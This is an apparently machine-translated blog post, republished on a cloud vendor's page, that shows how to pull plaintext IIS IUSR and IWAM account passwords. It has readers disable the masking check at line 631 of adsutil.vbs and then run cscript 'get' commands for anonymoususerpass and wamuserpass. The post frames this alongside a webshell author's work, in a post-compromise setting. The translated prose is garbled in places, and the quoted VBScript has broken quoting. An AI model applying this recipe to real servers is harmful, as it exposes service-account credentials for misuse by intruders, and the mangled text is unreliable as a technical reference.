Obtain the IIS Guest Account (IUSR_XXX) and process start account (IWAM_XXX) passwords

Source: Internet
Author: User

When I visited the Blog of Bin niu (author of aspxspy) Today, I suddenly noticed that his earlier log mentioned that the IIS user name and password seem to be saved in plaintext, however, I did not explain how to find the plaintext password.

Finally, I tried to reset the iispassword in the previous example, and set the iispassword to cscript.exe adsutil. vbs set xxxxxx. If there is a set, get will also be available in most cases. If you check the usage, you can read the adsutil. vbs code. After all, vbs is a plaintext script, so it is easier to find a method.

Simple:

C: change the value of True in row 631 of InetpubAdminScriptsadsutil. vbs to False.

Then execute

Cscript.exe adsutil. vbs get w3svc/anonymoususerpass

Cscript.exe adsutil. vbs get w3svc/wamuserpass

The Code is as follows:

========================================================== ======================================

If (UCase (IIsSchemaObject. Syntax) = "STRING") Then

If (IsSecureProperty (ObjectParameter, MachineName) = False) Then is modified here, row 631

ValueDisplay = ValueDisplay &""""&"**********"&""""

Else

ValueDisplay = ValueDisplay & "& ValueList &""""

End If

ElseIf (UCase (IIsSchemaObject. Syntax) = "BINARY") Then

========================================================== ======================================

No picture, no truth (this sentence is referenced by o (operator _ operator) o ...)



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.